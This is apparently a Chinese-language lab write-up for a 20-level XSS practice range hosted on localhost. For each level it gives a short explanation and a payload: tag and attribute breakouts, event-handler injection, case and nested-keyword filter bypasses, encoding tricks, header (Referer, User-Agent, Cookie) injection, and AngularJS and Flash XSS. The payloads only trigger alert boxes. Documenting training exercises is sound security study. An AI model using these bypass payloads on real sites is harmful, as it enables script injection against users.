在知识星球上看到别人发的一个XSS靶场，刚好适合刷完sql-labs的我学习XSS

level1

• 没有任何过滤，直接URL后面加XSS测试语句弹窗

exp:

http://localhost/xss_test/level1.php?name=123<script>alert('123')</script>;

level2

• 有搜索框，像第一关一样在搜索框测试一下，但是没有像第一关一样弹窗

• 查看源码发现我们的XSS语句被赋值给value并且在input标签里，所以我们需要闭合value和input标签就可以正常弹窗了

1"><script>alert('1');</script>

level3

• 转义了尖括号，这里可以用单引号闭合value但是没办法闭合input标签，但是可以注释掉标签然后用事件弹窗

1' onclick=alert(1)//

level4

• 跟第三关差不多，过滤了尖括号，用双引号闭合value然后注释掉标签用事件弹窗

1" onclick=alert(1)//

level5

• 过滤了script和onclick标签，但是没过滤a标签

"><a href=" javascript:alert(1)"

level6

• 过滤了script，onclick，href，但是由于是用str_replace函数来过滤的，所以可以用大小写绕过

"><a HREF=" javascript:alert(1)"

level7

• 尝试了一下前面的payload，发现on,script,href关键字被屏蔽，但由于是直接替换为空，所以可以用单词嵌套来绕过

1" oonnclick=alert(1)//

level8

• 添加友情链接所以直接就有一个href标签，首先尝试了javascript:laert(1),

• 但是发现script被过滤了，然后尝试大小写绕过不行

• 最后用html实体编码绕过

javascript:alert(1)

level9

• script被过滤，添加的url有验证合法性，没有带http://内则不合法，可以放在注释后面，通过tab制表符(%09)绕过对script的过滤

http://localhost/xss_test/level9.php?keyword=javascr%09ipt:alert(1)//http://

level10

• 有隐藏的form，尝试看能否注入

http://localhost/xss_test/level10.php?keyword=well done!&t_ilnk=" tyoe="text" 1&t_history=" type="text" 2&t_sort=" type="text" 3

• 发现t_sort是可以注入的，于是用t_sort来弹窗

http://localhost/xss_test/level10.php?keyword=well done!&t_sort=" type="text" onclick="alert(1)

level11

• 发现有个t_ref字段是http referer的值，于是抓包修改

• 修改前

• 修改referer后

" type="text" onclick="alert(1)

level12

• 源码发现t_ua字段是http User-Agent的值，所以还是抓包修改！

" type="text" onclick="alert(1)

level13

• 字段t_cook跟cookie的值一样，抓包修改cookie

Cookie: user=call+me+maybe%3F" type="text" onclick="alert(1);

level14

• http://exofvoewer.org登不上，放弃了，可以直接看先知上的wp了解exif xss

level15

• 这题有angular js，然后ng-include相当于php的include函数，然后src参数被转义了，最终我们
  可以include leve1然后再用img标签传xss(这里我用firefox打不成功，但是换chrome就可以了)

http://localhost/xss_test/level15.php?src='level1.php?name=<img src=1 onerror=alert(1)>'

level16

• script，空格被过滤，可以考虑用上一关的img标签来绕过以及%0a绕过空格

http://localhost/xss_test/level16.php?keyword=%3Cimg%0asrc=1%0aonerror=alert(1)%3E

level17

• 直接在embed标签插入onmouseover事件

http://localhost/xss_test/level17.php?arg01=a&arg02=b onmouseover=alert(1)

level18

• 跟17关一样

http://localhost/xss_test/level18.php?arg01=a&arg02=b%20onmouseover=alert(1)

level19

• flash xss，需要对flash的反编译对源码进行分析，这里使用jpexs-decompiler来分析，首先定位getURL函数

• 然后追踪到sIFR的内容

• 得知version参数可以传入loc4变量中，即sIFR的内容中，但是getURL只在内容为link时打开，所以分析contentIsLink函数

• 所以我们可以构造<a > </a> 标签来传值

http://localhost/xss_test/level19.php?arg01=version&arg02=<a href="javascript:alert(1)">123</a>

• 点击123即可xss

level20

• 这题是zeroclipboard.swf的xss，上网搜了一下，没太看懂，先放个payload吧，以后慢慢理解

http://localhost/xss_test/level20.php?arg01=id&arg02=\%22))}catch(e){}if(!self.a)self.a=!alert(1)//%26width%26height

参考文章：

• https://www.jianshu.com/p/7b8fe7f01d62
• https://www.freebuf.com/sectool/108568.html
• https://www.cnblogs.com/r00tuser/p/7407459.html